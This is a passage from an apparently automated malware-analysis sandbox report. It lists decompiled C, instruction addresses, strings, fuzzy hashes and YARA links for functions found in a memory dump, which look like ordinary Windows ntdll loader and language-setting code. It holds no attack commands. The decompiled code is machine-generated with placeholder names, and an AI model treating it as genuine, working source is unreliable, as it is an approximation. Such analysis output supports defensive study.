						}
						_t102 =  *0x1a75780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01A05510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1a75780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E019A7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E019A7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01A07016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E019A7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E019A7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01A07016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E019BA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0198B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x01997e4c
0x01997e50
0x01997e55
0x01997e58
0x01997e5d
0x01997e71
0x01997f33
0x01997e77
0x01997e77
0x01997e79
0x01997e79
0x01997e7e
0x01997f45
0x019e9848
0x00000000
0x019e9848
0x01997f4e
0x01997f53
0x01997f5a
0x00000000
0x00000000
0x019e985a
0x019e9862
0x019e9866
0x00000000
0x019e986c
0x00000000
0x019e986c
0x01997e84
0x01997e84
0x01997e8d
0x019e9871
0x01997eb8
0x01997ec0
0x01997ec0
0x01997e9a
0x019e987e
0x00000000
0x00000000
0x019e9884
0x019e988b
0x019e98a7
0x019e98ac
0x019e98b1
0x019e98b6
0x019e98b8
0x019e98b8
0x019e98b9
0x00000000
0x019e98b9
0x01997ea0
0x01997ea7
0x00000000
0x00000000
0x01997eac
0x01997eb1
0x01997ec6
0x01997ed0
0x019e98cc
0x01997ed6
0x01997ed6
0x01997ed6
0x01997ede
0x01997ee3
0x019e98e3
0x019e98f0
0x019e9902
0x019e98f2
0x019e98fb
0x019e98fb
0x019e9907
0x019e991d
0x019e991d
0x019e9907
0x019e98e3
0x01997ef0
0x01997f14
0x01997f14
0x01997f1e
0x019e9946
0x01997f24
0x01997f24
0x01997f24
0x01997f2c
0x019e996a
0x019e9975
0x019e9975
0x019e997e
0x019e9993
0x019e9993
0x019e997e
0x00000000
0x01997ef2
0x01997efc
0x01997f0a
0x01997f0e
0x019e9933
0x00000000
0x019e9933
0x00000000
0x01997f0e
0x00000000
0x00000000
0x00000000
0x01997eb1

Strings

LdrpCompleteMapModule, xrefs: 019E9898
minkernel\ntdll\ldrmap.c, xrefs: 019E98A2
Could not validate the crypto signature for DLL %wZ, xrefs: 019E9891

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 3e3e6ead2a5d97b48f7ea564f0d2898b029c9d9936a6a10f5335ff739527ccb7
Instruction ID: a9f96b4e0b64650d6a9ef152499a3bf5df685bdbdc2597c1c4c16e9c3011ea32
Opcode Fuzzy Hash: 3e3e6ead2a5d97b48f7ea564f0d2898b029c9d9936a6a10f5335ff739527ccb7
Instruction Fuzzy Hash: 3551E3316107459BEB2ACBDDC944F6A7BE8AB40314F040559E9599B3E1DB30FD00CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0198E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0198E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0198F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E019C95D0();
						}
						if(_t78 != 0) {
							L019A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E019CFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E019CBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E019C9600();
					if(_t97 < 0) {
						goto L6;
					}
					E019CBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0198F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E019CBB40(_t83, _t102 + 0x24, _t78);
								if(L019943C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E019CBB40(_t84, _t102 + 0x24, _t94);
									if(L019943C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0198e620
0x0198e628
0x0198e62f
0x0198e631
0x0198e635
0x0198e637
0x0198e63e
0x019e5503
0x019e5503
0x0198e64c
0x0198e64c
0x0198e651
0x00000000
0x00000000
0x0198e661
0x0198e665
0x019e542a
0x0198e715
0x0198e71a
0x0198e71c
0x0198e720
0x0198e720
0x0198e727
0x0198e736
0x0198e736
0x0198e743
0x0198e743
0x0198e673
0x0198e678
0x0198e67d
0x0198e682
0x0198e685
0x0198e692
0x0198e69b
0x0198e6a3
0x0198e6ad
0x0198e6b1
0x0198e6b2
0x0198e6bb
0x0198e6bf
0x0198e6c0
0x0198e6c8
0x0198e6cc
0x0198e6d5
0x0198e6d9
0x00000000
0x00000000
0x0198e6e5
0x0198e6ea
0x0198e6f9
0x0198e70b
0x0198e70f
0x019e5439
0x019e545e
0x019e545e
0x00000000
0x019e545e
0x019e543b
0x019e543e
0x019e5440
0x019e5445
0x019e5472
0x019e5475
0x019e548d
0x019e5493
0x019e54a9
0x00000000
0x00000000
0x019e54ab
0x019e54b4
0x019e54bc
0x019e54c8
0x019e54de
0x019e54fb
0x019e54e0
0x019e54e6
0x019e54eb
0x019e54eb
0x019e54de
0x00000000
0x019e54bc
0x019e5477
0x019e547a
0x019e5480
0x019e5483
0x019e5486
0x019e548b
0x00000000
0x00000000
0x00000000
0x019e548b
0x00000000
0x00000000
0x00000000
0x00000000
0x019e5447
0x019e5447
0x019e5447
0x019e5447
0x019e544e
0x00000000
0x00000000
0x019e5450
0x019e5452
0x019e5455
0x019e545a
0x00000000
0x00000000
0x00000000
0x019e545c
0x019e546a
0x019e546d
0x019e546f
0x00000000
0x019e546f
0x0198e70f

Strings

@, xrefs: 0198E6C0
InstallLanguageFallback, xrefs: 0198E6DB
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0198E68C

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: f2133805e762cdd2002f3980be3dae5590febf17a9ff3b8ea8dde13d3aab0b26
Instruction ID: 60ecb17f37aa3b32ad06c083cbf39119b8231a1f343672d398770b214b77a06d
Opcode Fuzzy Hash: f2133805e762cdd2002f3980be3dae5590febf17a9ff3b8ea8dde13d3aab0b26
Instruction Fuzzy Hash: 3B51C0765043469BE711EF68C454A6BB7ECAF88A59F05092EF98DD7240FB30D904C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 01A4E539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E01A4E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E01A4BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E01A4BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E01A4AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E019C9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E01A4A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E01A4A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E019C9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E01A4A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E01A4A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E019A2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0199B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0199FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E019A7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E01A3FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x01a4e547
0x01a4e549
0x01a4e54f
0x01a4e553
0x01a4e557
0x01a4e55a
0x01a4e55c
0x01a4e55f
0x01a4e561
0x01a4e567
0x01a4e56b
0x01a4e7e2
0x00000000
0x01a4e571
0x01a4e575
0x01a4e577
0x01a4e57b
0x01a4e57c
0x01a4e57d
0x01a4e57e
0x01a4e57f
0x01a4e588
0x01a4e58f
0x01a4e591
0x01a4e592
0x01a4e592
0x01a4e596
0x01a4e59e
0x01a4e5a0
0x01a4e5a6
0x01a4e61d
0x01a4e61d
0x01a4e621
0x01a4e623
0x01a4e630
0x01a4e630
0x01a4e7e6
0x01a4e7eb
0x01a4e7ed
0x01a4e7f4
0x01a4e7fa
0x01a4e7ff
0x01a4e7ff
0x01a4e80a
0x01a4e812
0x01a4e812
0x01a4e5ab
0x01a4e5b4
0x01a4e5b9
0x01a4e5be
0x01a4e5c0
0x01a4e5c2
0x01a4e5c8
0x01a4e5c9
0x01a4e5cb
0x01a4e5cc
0x01a4e5d5
0x01a4e5e4
0x01a4e5f1
0x01a4e5f8
0x01a4e5f8
0x01a4e5d5
0x01a4e602
0x01a4e616
0x01a4e63d
0x01a4e644
0x01a4e64d
0x01a4e652
0x01a4e657
0x01a4e659
0x01a4e65b
0x01a4e661
0x01a4e662
0x01a4e664
0x01a4e665
0x01a4e66e
0x01a4e67d
0x01a4e68a
0x01a4e691
0x01a4e691
0x01a4e66e
0x01a4e6b0
0x00000000
0x01a4e6b6
0x01a4e6bd
0x01a4e6c7
0x01a4e6d7
0x01a4e6d9
0x01a4e6db
0x01a4e6de
0x01a4e6e3
0x01a4e6f3
0x01a4e6fc
0x01a4e700
0x01a4e700
0x01a4e704
0x01a4e70a
0x01a4e70a
0x01a4e713
0x01a4e716
0x01a4e719
0x01a4e720
0x01a4e761
0x01a4e76b
0x01a4e774
0x01a4e77a
0x01a4e77a
0x01a4e78a
0x01a4e791
0x01a4e799
0x01a4e79b
0x01a4e79f
0x01a4e7aa
0x01a4e7c0
0x01a4e7ac
0x01a4e7b2
0x01a4e7b9
0x01a4e7b9
0x01a4e7c7
0x01a4e806
0x00000000
0x01a4e7c9
0x01a4e7d1
0x01a4e7d8
0x00000000
0x01a4e7d8
0x00000000
0x00000000
0x01a4e722
0x01a4e72e
0x01a4e748
0x01a4e74c
0x01a4e754
0x01a4e756
0x01a4e75c
0x01a4e75c
0x00000000
0x01a4e75c
0x01a4e758
0x01a4e758
0x00000000
0x01a4e758
0x01a4e750
0x00000000
0x00000000
0x01a4e752
0x00000000
0x01a4e752
0x01a4e730
0x01a4e735
0x01a4e73d
0x01a4e73f
0x00000000
0x00000000
0x01a4e741
0x01a4e741
0x00000000
0x01a4e741
0x01a4e739
0x00000000
0x00000000
0x01a4e73b
0x00000000
0x01a4e73b
0x01a4e722
0x01a4e720
0x01a4e6b0
0x01a4e618
0x00000000
0x01a4e618

Strings

`, xrefs: 01A4E5D7
`, xrefs: 01A4E670

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 5b0d71513919d65f86a3460231d9b06a5cab1e20c4ae37e84e3d94107ea340ab
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: EB916F716043429BE725CF29C945B1BBBE5BFC4724F18892DF699CB280E778E904CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01A051BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON

Download Yara Rule

Strings

UEFI, xrefs: 01A0521D
Legacy, xrefs: 01A05226

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 4bafa4c0d1364abd816540289eadc62909af0b4208fbe013c4b30daade4ac6c0
Instruction ID: 7b192d7aefa6466c062d0ca093cc584f492a984f08826bbaa63c55a58ff1f731
Opcode Fuzzy Hash: 4bafa4c0d1364abd816540289eadc62909af0b4208fbe013c4b30daade4ac6c0
Instruction Fuzzy Hash: 33516CB1E006099FDB26DFA9D990AAEBBF8FF48700F14442DE649EB291D671D900CF51

Uniqueness

Uniqueness Score: -1.00%

Function 019AB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019AB9A5

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 318a329573e947e1ae47d6b58cb4e16b080d9103f599860b5f828aab6b323d54
Instruction ID: c6391c2ad17eb21b2f1b6b78572de8caf1a58a36e90014e93d24f43d5ce59e7e
Opcode Fuzzy Hash: 318a329573e947e1ae47d6b58cb4e16b080d9103f599860b5f828aab6b323d54
Instruction Fuzzy Hash: 31516D71A08341DFC720CF69C49092AFBE9FB88615F94496EF68A87355D731E848CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0198B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

APIs

_vswprintf_s.LIBCMT ref: 019E48AD

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: acde32b992cb685248cbd5b452c66c2308aad4d3d5ebbaa8dec963393ee34a22
Instruction ID: 24cfcabee8d58d1277ec85ac8b02aa8530458f8bf206731543a9e7fbe4d6b267
Opcode Fuzzy Hash: acde32b992cb685248cbd5b452c66c2308aad4d3d5ebbaa8dec963393ee34a22
Instruction Fuzzy Hash: 3451D071D002598FEB22CF68C848BAEBBF5BF44B10F1441ADD85DEB282D7754941CB92

Uniqueness

Uniqueness Score: -1.00%

Function 019B2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON

Download Yara Rule

Strings

PATH, xrefs: 019B2642, 019B2691

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: afff1bc1a17e14eb1d263c71c6bd9253bcbcebbc3408240458954097ad2e2283
Instruction ID: 0b3c12a8bfa5f1b96551fc767a8851d89f236fd6eac943a83c4a979331800435
Opcode Fuzzy Hash: afff1bc1a17e14eb1d263c71c6bd9253bcbcebbc3408240458954097ad2e2283
Instruction Fuzzy Hash: 58C1B071E00209EBDB25DF99CAC0BEEBBB5FF48740F144429E509AB250E774B902CB64

Uniqueness

Uniqueness Score: -1.00%

Function 019BFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON

Download Yara Rule

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 019FBE0F

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 478a0e3c3ed880ba203ad5994cbe3a0ffef0085016e19d6273d717da2a329f2f
Instruction ID: cc183a37f436d64b84b785f18e19ced804a245149ca28132ddf38253391b0d27
Opcode Fuzzy Hash: 478a0e3c3ed880ba203ad5994cbe3a0ffef0085016e19d6273d717da2a329f2f
Instruction Fuzzy Hash: 7DA10671B00616DBEB25DF6CC990BBAB7A8AF84711F04456DEA0ECB681DB30D941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01982D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 019DFA4A

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: eba203aca4d66b00cdbb11838f229333087410dc4c57eaa1c96c4180f9306a55
Instruction ID: 0a95237e3f1798e33ba85cd9d2bb772387a9251ecdbd806c52e7444b7476765e
Opcode Fuzzy Hash: eba203aca4d66b00cdbb11838f229333087410dc4c57eaa1c96c4180f9306a55
Instruction Fuzzy Hash: EF615931A006459FDB32EF6CC845B7E7BE9EB40714F148669D91E9B2C2D734A902C792

Uniqueness

Uniqueness Score: -1.00%

Function 01A50EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

`, xrefs: 01A50F16

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: d7a7ce8a7a523c669405fdb5c87357f4169966d0e31318a585a7f6e7b393efc6
Instruction ID: c1630dc5565aa48203b9976ddaeede114169d5c232052290dfe74b35e77929e8
Opcode Fuzzy Hash: d7a7ce8a7a523c669405fdb5c87357f4169966d0e31318a585a7f6e7b393efc6
Instruction Fuzzy Hash: 2F51B1713083429FE365DF28D984B2BBBE5EBC4714F04092CFA9697290D775E909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 019BF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 019BF124

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: a285eb66b6eaa2a4166b86cf4fe6673682b2d07afd2dc1e2ebc924c1beb98c6d
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 7A518D71504711AFC320DF29C840A6BBBF8FF98B10F00892DFA9987690E7B4E914CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01A03540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 01A0358F

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: b43a46bfe72bafbd3c3dfad1a7d68c414835323784563138989df001891d5c51
Instruction ID: 70dbbeaea49a46034c6dff8406f23d44fd6b8d408e4a5ec35bed45cd1bb83089
Opcode Fuzzy Hash: b43a46bfe72bafbd3c3dfad1a7d68c414835323784563138989df001891d5c51
Instruction Fuzzy Hash: 384133B1D0052DAEDF21DB50DD84FAEB77CAF54714F0045A5AA49AB280DB309E888F95

Uniqueness

Uniqueness Score: -1.00%

Function 01A505AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

`, xrefs: 01A50633

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 1ba9897755664766e60a48d4a1d489f3123b35bb5e44daa7e6af1b3e4e756d50
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 7B31E2322087066BE750DF28CE85F9A7BD9EBC4754F144229FE589B680E6B0E904C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 01A03884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 01A038B4

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 132bdcbda8e11c9641be7219a584f9cb3ebd0ed66045d78d6c1d9c32c1baddc7
Instruction ID: 15d7bad0744f9ac67da9edc45ea168d42ab34fe38c2c3b2c0ebd969e47203d89
Opcode Fuzzy Hash: 132bdcbda8e11c9641be7219a584f9cb3ebd0ed66045d78d6c1d9c32c1baddc7
Instruction Fuzzy Hash: F931F132D0150AAFEF16DB59D955E6BBB74FF80B60F014169AA59A7280D7309E04C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 019BD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 019BD303

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 6660432dde64d7569e910fd3fa35d84fbc1a3d05945c08fbfff2d63767e28169
Instruction ID: 334bde6e0bb592031629873bdd4dbd40afc77fa5c99665f37046264ac37cdd20
Opcode Fuzzy Hash: 6660432dde64d7569e910fd3fa35d84fbc1a3d05945c08fbfff2d63767e28169
Instruction Fuzzy Hash: 3831AFB25093059FD711DFA8CAC09ABBBE8EBD565CF00092EF99983211D635DD08CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01991B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

WindowsExcludedProcs, xrefs: 01991BC5

Memory Dump Source

